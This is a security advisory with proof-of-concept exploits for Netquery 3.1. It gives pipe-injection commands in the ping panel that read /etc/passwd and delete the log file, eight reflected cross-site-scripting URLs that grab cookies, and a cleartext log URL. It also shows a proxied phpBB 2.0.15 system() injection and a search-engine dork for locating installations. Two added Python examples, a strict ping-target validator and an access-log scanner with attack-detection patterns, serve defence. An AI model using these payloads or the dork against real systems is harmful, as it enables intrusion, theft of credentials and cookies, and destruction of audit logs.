netquery 3.1 allows for remote command execution, cross site scripting, and information disclosure attacks. Detailed exploitation provided.
8b7e5a03a311f1c2c6e28b6ab732cfa98658760038812a4ed3611802cea3f80e
Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit
software: Netquery 3.1
author site: http://www.virtech.org/tools/
a user can execute commands on the target system through the PING panel (if enabled, as it often is) by using the pipe character in the
"Ping IP Address or Host Name" input text box, for example:
| cat /etc/passwd
then you will see the plain text password file
| pwd
to see the current path
| rm [pwd_output]/logs/nq_log.txt
to delete the log file...
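The root cause of the ping problem described above is that the user-supplied host is handed to a shell, where a pipe character starts a second command. The following is an added example (not code from Netquery or from the advisory's author) of how a ping handler avoids that class of bug: the input is accepted only if it parses as an IP literal or matches a strict hostname grammar, and the command is built as an argv list with no shell involved, so a pipe, semicolon or backtick can never be interpreted. The function names and the `-c 4` count are assumptions of this example.

```python
import ipaddress
import re
import subprocess
from typing import List, Optional

# Strict hostname grammar (RFC 1123 labels): letters, digits and inner hyphens only.
# Anything outside this grammar, including shell metacharacters, is rejected up front.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(r"^(?:" + _LABEL + r"\.)*" + _LABEL + r"\.?$")


def validate_ping_target(raw: str) -> Optional[str]:
    """Return a canonical target if `raw` is an IPv4/IPv6 literal or a hostname, else None."""
    value = raw.strip()
    if not value or len(value) > 253:
        return None
    try:
        # ipaddress accepts only well-formed literals; "| cat /etc/passwd" fails here.
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if _HOSTNAME_RE.fullmatch(value):
        return value
    return None


def build_ping_argv(raw: str, count: int = 4) -> Optional[List[str]]:
    """Build the ping command as an argument vector, or None if the input is rejected."""
    target = validate_ping_target(raw)
    if target is None:
        return None
    # The target is one argv element; it is never re-parsed by a shell.
    return ["ping", "-c", str(count), target]


def run_ping(raw: str) -> str:
    """Run ping for a validated target (hypothetical handler for the PING panel)."""
    argv = build_ping_argv(raw)
    if argv is None:
        return "invalid target"
    # shell=False (the default) plus an argv list is what makes injection impossible here.
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    return proc.stdout


if __name__ == "__main__":
    for candidate in ["192.0.2.1", "example.com", "| cat /etc/passwd"]:
        print(repr(candidate), "->", build_ping_argv(candidate))
```

The validator is deliberately an allow-list rather than a deny-list of dangerous characters: a deny-list has to anticipate every shell's quoting rules, whereas an allow-list only has to describe what a legitimate ping target looks like.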
disclosure of user activity:
if enabled, a user can view the clear text log file through the url:
http://[target]/[path]/logs/nq_log.txt
xss:
http://[target]/[path]/submit.php?portnum="/><script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/portlist.php?portnum=<script>alert(document.cookie)</script>
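For anyone responsible for a Netquery installation, the three behaviours above (a pipe reaching the ping handler, reads of `logs/nq_log.txt`, and script tags in the `step`, `body` or `portnum` parameters) all leave traces in the web server's access log. The following is an added example (not part of the advisory) that scans Apache combined-format log lines for those traces. The sample log lines are constructed for this example; the `nqping.php?host=` request in them is a hypothetical GET form of the ping panel, since form bodies submitted by POST do not appear in an access log and would need an application-level log instead.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (Apache "combined" layout) for this example only.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /nq/nqports.php?step=<script>alert(document.cookie)</script> HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /nq/logs/nq_log.txt HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /nq/nqping.php?host=%7C%20cat%20%2Fetc%2Fpasswd HTTP/1.1" 200 1024 "-" "curl/8.0"
198.51.100.9 - - [10/Oct/2023:13:57:12 +0000] "GET /nq/nqports.php?step=2 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Request line: "METHOD target HTTP/x.y"
_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Direct reads of the activity log named in the advisory.
_LOG_PATH_RE = re.compile(r"/logs/nq_log\.txt$", re.IGNORECASE)
# Script tag in any decoded parameter value.
_SCRIPT_RE = re.compile(r"<\s*script", re.IGNORECASE)
# Characters that mean something to a shell; a ping target never needs them.
_SHELL_META = set("|;&`$")


def classify_request(target: str) -> List[str]:
    """Return human-readable findings for one request target (path plus query)."""
    findings: List[str] = []
    parts = urlsplit(target)
    if _LOG_PATH_RE.search(parts.path):
        findings.append("log file read")
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            # parse_qs already percent-decodes once; decoding again also catches
            # double-encoded payloads such as %253C.
            decoded = unquote(value)
            if _SCRIPT_RE.search(decoded):
                findings.append("script tag in parameter " + name)
            if any(ch in _SHELL_META for ch in decoded):
                findings.append("shell metacharacter in parameter " + name)
    return findings


def scan_log(text: str) -> List[Tuple[int, str, List[str]]]:
    """Scan log text; return (line number, client address, findings) for flagged lines."""
    hits: List[Tuple[int, str, List[str]]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        match = _REQ_RE.search(line)
        if not match:
            continue
        findings = classify_request(match.group("target"))
        if findings:
            client = line.split(" ", 1)[0]
            hits.append((lineno, client, findings))
    return hits


if __name__ == "__main__":
    for lineno, client, findings in scan_log(SAMPLE_LOG):
        print("line %d from %s: %s" % (lineno, client, ", ".join(findings)))
```

Decoding before matching matters: a browser or a scanner will usually send `<` as `%3C` and `|` as `%7C`, so a pattern applied to the raw request line misses most of the traffic the scanner is meant to catch.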
a user can use on-line Netquery installations as proxy servers
to launch exploits from the HTTP GET request panel, for example:
exploiting phpBB 2.0.15:
make a GET request for
http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command]).'&command=cat%20/etc/passwd
googledork: inurl:nquser.php
rgod
email: rgod[at]autistici.org
site: http://rgod.altervista.org